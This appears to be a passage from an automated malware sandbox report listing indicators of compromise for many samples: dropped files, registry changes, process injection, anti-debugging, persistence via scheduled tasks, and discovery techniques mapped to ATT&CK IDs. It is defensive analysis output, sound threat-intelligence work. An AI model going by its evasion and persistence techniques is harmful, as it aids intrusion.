File opened for modification	C:\Windows\SysWOW64\symbols\dll\wuser32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\msvcrt.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\dbghelp.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\gdiplus.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\oleaut32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\ntasn1.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\ntasn1.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\wkernelbase.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\apphelp.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\wuser32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\msvcp_win.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\shell32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\shcore.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\wntdll.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\ws2_32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\comctl32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\advapi32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\DLL\dbgcore.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\ntasn1.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\ncrypt.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\sechost.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\shell32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\shcore.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\ole32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\DLL\wkernel32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\wkernelbase.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\wkernelbase.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\msvcrt.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\msvcp_win.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\advapi32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\DLL\iphlpapi.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\combase.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\oleaut32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Keys	MeshAgent.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Keys\0B22774DA9650D4DDD79EEAC07386987AA716C29	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\ucrtbase.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\wgdi32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\wgdi32full.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\shcore.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\wntdll.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\apphelp.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\DLL\bcrypt.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\Kernel.Appcore.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\bcryptprimitives.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\bcryptprimitives.pdb	MeshAgent.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\AA62C3769033B75A9ACB2624DC3338E100D25689	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\gdiplus.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\comctl32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\comctl32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\wrpcrt4.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\wuser32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\wwin32u.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\msvcp_win.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\sechost.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dbgcore.pdb	MeshAgent.exe

Enumerates processes with tasklist 1 TTPs 4 IoCs

discovery

Process Discovery

T1057

pid	Process
37080	tasklist.exe
37468	tasklist.exe
15356	tasklist.exe
40568	tasklist.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 55 IoCs

pid	Process
316	Geek_se.exe
316	Geek_se.exe
316	Geek_se.exe
316	Geek_se.exe
316	Geek_se.exe
316	Geek_se.exe
316	Geek_se.exe
316	Geek_se.exe
316	Geek_se.exe
316	Geek_se.exe
316	Geek_se.exe
316	Geek_se.exe
316	Geek_se.exe
316	Geek_se.exe
316	Geek_se.exe
316	Geek_se.exe
316	Geek_se.exe
316	Geek_se.exe
316	Geek_se.exe
316	Geek_se.exe
316	Geek_se.exe
316	Geek_se.exe
316	Geek_se.exe
316	Geek_se.exe
316	Geek_se.exe
316	Geek_se.exe
316	Geek_se.exe
316	Geek_se.exe
316	Geek_se.exe
316	Geek_se.exe
316	Geek_se.exe
316	Geek_se.exe
316	Geek_se.exe
316	Geek_se.exe
316	Geek_se.exe
316	Geek_se.exe
316	Geek_se.exe
316	Geek_se.exe
316	Geek_se.exe
316	Geek_se.exe
316	Geek_se.exe
316	Geek_se.exe
316	Geek_se.exe
316	Geek_se.exe
316	Geek_se.exe
316	Geek_se.exe
316	Geek_se.exe
316	Geek_se.exe
316	Geek_se.exe
316	Geek_se.exe
316	Geek_se.exe
316	Geek_se.exe
316	Geek_se.exe
316	Geek_se.exe
316	Geek_se.exe

Suspicious use of SetThreadContext 5 IoCs

description	pid	Process	procid_target
PID 18968 set thread context of 19316	18968	winupsecvmgr.exe	242
PID 18968 set thread context of 19336	18968	winupsecvmgr.exe	243
PID 23972 set thread context of 24052	23972	crypted.exe	368
PID 27916 set thread context of 34348	27916	Ukodbcdcl.exe	518
PID 12888 set thread context of 12960	12888	chicken123.exe	569

Drops file in Program Files directory 8 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Mesh Agent\MeshAgent.exe	meshagent32-group.exe
File opened for modification	C:\Program Files (x86)\Mesh Agent\MeshAgent.db	MeshAgent.exe
File created	C:\Program Files (x86)\Mesh Agent\MeshAgent.db	MeshAgent.exe
File opened for modification	C:\Program Files (x86)\Mesh Agent\MeshAgent.db.tmp	MeshAgent.exe
File created	C:\Program Files (x86)\Mesh Agent\MeshAgent.db.tmp	MeshAgent.exe
File created	C:\Program Files (x86)\Mesh Agent\MeshAgent.msh	MeshAgent.exe
File opened for modification	\??\c:\program files\common files\microsoft shared\stationery\funletters\scenic\foggy-mountains.htm	foggy-mountains.exe
File opened for modification	\??\c:\program files\common files\microsoft shared\stationery\funletters\scenic\foggy-mountains.jpg	foggy-mountains.exe

Drops file in Windows directory 17 IoCs

description	ioc	Process
File created	C:\Windows\sysppvrdnvs.exe	pi.exe
File opened for modification	C:\Windows\sysvplervcs.exe	s.exe
File opened for modification	C:\Windows\sysnldcvmr.exe	1548427715.exe
File opened for modification	C:\Windows\DpiRachel	VidsUsername.exe
File created	C:\Windows\sysnldcvmr.exe	1548427715.exe
File opened for modification	C:\Windows\sysmablsvr.exe	tt.exe
File created	C:\Windows\Tasks\Test Task17.job	Ukodbcdcl.exe
File created	C:\Windows\sysppvrdnvs.exe	twztl.exe
File opened for modification	C:\Windows\GtkRace	DivineDialogue.exe
File opened for modification	C:\Windows\sysppvrdnvs.exe	pi.exe
File created	C:\Windows\sysvplervcs.exe	s.exe
File opened for modification	C:\Windows\TargetSki	VidsUsername.exe
File opened for modification	C:\Windows\BirthAttacked	DivineDialogue.exe
File created	C:\Windows\sysnldcvmr.exe	1483322851.exe
File created	C:\Windows\sysmablsvr.exe	tt.exe
File opened for modification	C:\Windows\YrQueensland	DivineDialogue.exe
File opened for modification	C:\Windows\ManualsDenver	DivineDialogue.exe

Launches sc.exe 17 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
12764	sc.exe
12852	sc.exe
12940	sc.exe
2992	sc.exe
5068	sc.exe
12716	sc.exe
2272	sc.exe
2188	sc.exe
16076	sc.exe
38316	sc.exe
4400	sc.exe
4372	sc.exe
3320	sc.exe
4980	sc.exe
4020	sc.exe
3476	sc.exe
12812	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

Program crash 6 IoCs

pid	pid_target	Process	procid_target
7104	6136	WerFault.exe	351
7420	24260	WerFault.exe	372
26604	25436	WerFault.exe	457
13056	12888	WerFault.exe	567
34336	35200	WerFault.exe	532
35464	35200	WerFault.exe	532

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	390324013.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1483322851.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	crypted.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2760524604.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	twztl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	VidsUsername.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	chicken123.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	shineencoder32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Installeraus.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	utility-inst.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PCclear_Eng_mini.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	pi.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Geek_se.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tt.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1740414134.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sysmablsvr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DivineDialogue.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dtl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	9402.tmp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	npp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sysppvrdnvs.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1475019939.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	choice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	255224367.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	foggy-mountains.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sysnldcvmr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	pothjadwtrgh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dayum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Ukodbcdcl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1548427715.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Windows.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 53 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
15476	PING.EXE
27592	PING.EXE
14236	PING.EXE
11524	PING.EXE
16324	PING.EXE
10304	PING.EXE
2632	PING.EXE
1128	PING.EXE
2556	PING.EXE
4276	PING.EXE
5276	PING.EXE
1656	PING.EXE
19896	PING.EXE
20176	PING.EXE
20440	PING.EXE
26548	PING.EXE
23320	PING.EXE
22296	PING.EXE
6696	PING.EXE
7028	PING.EXE
26784	PING.EXE
19612	PING.EXE
21012	PING.EXE
21540	PING.EXE
11276	PING.EXE
25308	PING.EXE
34608	PING.EXE
10580	PING.EXE
8820	PING.EXE
16620	PING.EXE
5584	PING.EXE
5900	PING.EXE
7856	PING.EXE
25012	PING.EXE
21808	PING.EXE
22080	PING.EXE
20752	PING.EXE
4048	PING.EXE
16864	PING.EXE
12228	PING.EXE
24736	PING.EXE
17344	PING.EXE
18624	PING.EXE
21292	PING.EXE
22852	PING.EXE
6024	PING.EXE
8240	PING.EXE
16052	PING.EXE
10880	PING.EXE
33484	PING.EXE
18080	PING.EXE
27316	PING.EXE
32136	PING.EXE

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	build_2024-07-25_20-56.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	build_2024-07-25_20-56.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	pothjadwtrgh.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	pothjadwtrgh.exe

Delays execution with timeout.exe 4 IoCs

evasion

pid	Process
8592	timeout.exe
7444	timeout.exe
27820	timeout.exe
35036	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{625F76EE-DE78-428A-8B2D-96F06F3707A5}	PCclear_Eng_mini.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{625F76EE-DE78-428A-8B2D-96F06F3707A5}\Compatibility Flags = "1024"	PCclear_Eng_mini.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	MeshAgent.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133764093730286896"	MeshAgent.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	cfx.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	cfx.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

pid	Process
38268	reg.exe

Runs net.exe

Runs ping.exe 1 TTPs 53 IoCs

Remote System Discovery

T1018

pid	Process
20752	PING.EXE
22852	PING.EXE
14236	PING.EXE
33484	PING.EXE
18624	PING.EXE
10580	PING.EXE
25308	PING.EXE
24736	PING.EXE
4048	PING.EXE
1656	PING.EXE
19896	PING.EXE
8820	PING.EXE
22296	PING.EXE
7856	PING.EXE
2632	PING.EXE
16324	PING.EXE
21292	PING.EXE
22080	PING.EXE
6024	PING.EXE
27592	PING.EXE
12228	PING.EXE
8240	PING.EXE
21808	PING.EXE
26548	PING.EXE
18080	PING.EXE
21540	PING.EXE
5900	PING.EXE
16864	PING.EXE
17344	PING.EXE
19612	PING.EXE
16620	PING.EXE
5584	PING.EXE
20176	PING.EXE
7028	PING.EXE
11524	PING.EXE
11276	PING.EXE
20440	PING.EXE
2556	PING.EXE
6696	PING.EXE
34608	PING.EXE
1128	PING.EXE
23320	PING.EXE
32136	PING.EXE
15476	PING.EXE
25012	PING.EXE
21012	PING.EXE
4276	PING.EXE
10304	PING.EXE
26784	PING.EXE
16052	PING.EXE
27316	PING.EXE
5276	PING.EXE
10880	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
8604	schtasks.exe
9924	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4420	powershell.exe
4420	powershell.exe
4420	powershell.exe
1492	powershell.exe
1492	powershell.exe
1492	powershell.exe
40692	Solara_Protect.exe
40692	Solara_Protect.exe
40692	Solara_Protect.exe
40692	Solara_Protect.exe
40692	Solara_Protect.exe
40692	Solara_Protect.exe
40692	Solara_Protect.exe
40692	Solara_Protect.exe
40692	Solara_Protect.exe
40692	Solara_Protect.exe
40692	Solara_Protect.exe
40692	Solara_Protect.exe
40692	Solara_Protect.exe
40692	Solara_Protect.exe
40692	Solara_Protect.exe
40692	Solara_Protect.exe
40692	Solara_Protect.exe
40692	Solara_Protect.exe
40692	Solara_Protect.exe
40692	Solara_Protect.exe
40692	Solara_Protect.exe
40692	Solara_Protect.exe
15436	stories.tmp
15436	stories.tmp
17016	531210104.exe
17572	99597542.exe
17572	99597542.exe
17876	816212898.exe
17876	816212898.exe
18296	3402010102.exe
18296	3402010102.exe
18640	powershell.exe
18640	powershell.exe
18640	powershell.exe
18296	3402010102.exe
18296	3402010102.exe
18968	winupsecvmgr.exe
18968	winupsecvmgr.exe
19128	powershell.exe
19128	powershell.exe
19128	powershell.exe
18968	winupsecvmgr.exe
18968	winupsecvmgr.exe
18968	winupsecvmgr.exe
18968	winupsecvmgr.exe
6052	52263531.exe
24260	build_2024-07-25_20-56.exe
24260	build_2024-07-25_20-56.exe
6264	powershell.exe
6264	powershell.exe
6264	powershell.exe
6624	powershell.exe
6624	powershell.exe
6624	powershell.exe
9300	powershell.exe
9300	powershell.exe
9300	powershell.exe
9472	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

pid	Process
35400	msedge.exe
35400	msedge.exe
35400	msedge.exe
35400	msedge.exe

Suspicious behavior: SetClipboardViewer 3 IoCs

pid	Process
5096	sysvplervcs.exe
2940	sysnldcvmr.exe
33236	sysmablsvr.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	5008	2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe
Token: SeDebugPrivilege	4424	Office.exe
Token: SeDebugPrivilege	4884	svchost.exe
Token: SeDebugPrivilege	4420	powershell.exe
Token: SeDebugPrivilege	1492	powershell.exe
Token: SeDebugPrivilege	4036	svchost.exe
Token: SeDebugPrivilege	3432	svchost.exe
Token: SeDebugPrivilege	40692	Solara_Protect.exe
Token: SeDebugPrivilege	8672	svchost.exe
Token: SeDebugPrivilege	8632	Windows.exe
Token: SeDebugPrivilege	9124	svchost.exe
Token: SeDebugPrivilege	15892	svchost.exe
Token: SeDebugPrivilege	16172	svchost.exe
Token: SeDebugPrivilege	16424	svchost.exe
Token: SeDebugPrivilege	16712	svchost.exe
Token: SeDebugPrivilege	17004	svchost.exe
Token: SeDebugPrivilege	17016	531210104.exe
Token: SeDebugPrivilege	17572	99597542.exe
Token: SeDebugPrivilege	17776	svchost.exe
Token: SeDebugPrivilege	17876	816212898.exe
Token: SeDebugPrivilege	18412	svchost.exe
Token: SeDebugPrivilege	18640	powershell.exe
Token: SeIncreaseQuotaPrivilege	18640	powershell.exe
Token: SeSecurityPrivilege	18640	powershell.exe
Token: SeTakeOwnershipPrivilege	18640	powershell.exe
Token: SeLoadDriverPrivilege	18640	powershell.exe
Token: SeSystemProfilePrivilege	18640	powershell.exe
Token: SeSystemtimePrivilege	18640	powershell.exe
Token: SeProfSingleProcessPrivilege	18640	powershell.exe
Token: SeIncBasePriorityPrivilege	18640	powershell.exe
Token: SeCreatePagefilePrivilege	18640	powershell.exe
Token: SeBackupPrivilege	18640	powershell.exe
Token: SeRestorePrivilege	18640	powershell.exe
Token: SeShutdownPrivilege	18640	powershell.exe
Token: SeDebugPrivilege	18640	powershell.exe
Token: SeSystemEnvironmentPrivilege	18640	powershell.exe
Token: SeRemoteShutdownPrivilege	18640	powershell.exe
Token: SeUndockPrivilege	18640	powershell.exe
Token: SeManageVolumePrivilege	18640	powershell.exe
Token: 33	18640	powershell.exe
Token: 34	18640	powershell.exe
Token: 35	18640	powershell.exe
Token: 36	18640	powershell.exe
Token: SeIncreaseQuotaPrivilege	18640	powershell.exe
Token: SeSecurityPrivilege	18640	powershell.exe
Token: SeTakeOwnershipPrivilege	18640	powershell.exe
Token: SeLoadDriverPrivilege	18640	powershell.exe
Token: SeSystemProfilePrivilege	18640	powershell.exe
Token: SeSystemtimePrivilege	18640	powershell.exe
Token: SeProfSingleProcessPrivilege	18640	powershell.exe
Token: SeIncBasePriorityPrivilege	18640	powershell.exe
Token: SeCreatePagefilePrivilege	18640	powershell.exe
Token: SeBackupPrivilege	18640	powershell.exe
Token: SeRestorePrivilege	18640	powershell.exe
Token: SeShutdownPrivilege	18640	powershell.exe
Token: SeDebugPrivilege	18640	powershell.exe
Token: SeSystemEnvironmentPrivilege	18640	powershell.exe
Token: SeRemoteShutdownPrivilege	18640	powershell.exe
Token: SeUndockPrivilege	18640	powershell.exe
Token: SeManageVolumePrivilege	18640	powershell.exe
Token: 33	18640	powershell.exe
Token: 34	18640	powershell.exe
Token: 35	18640	powershell.exe
Token: 36	18640	powershell.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
15436	stories.tmp
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
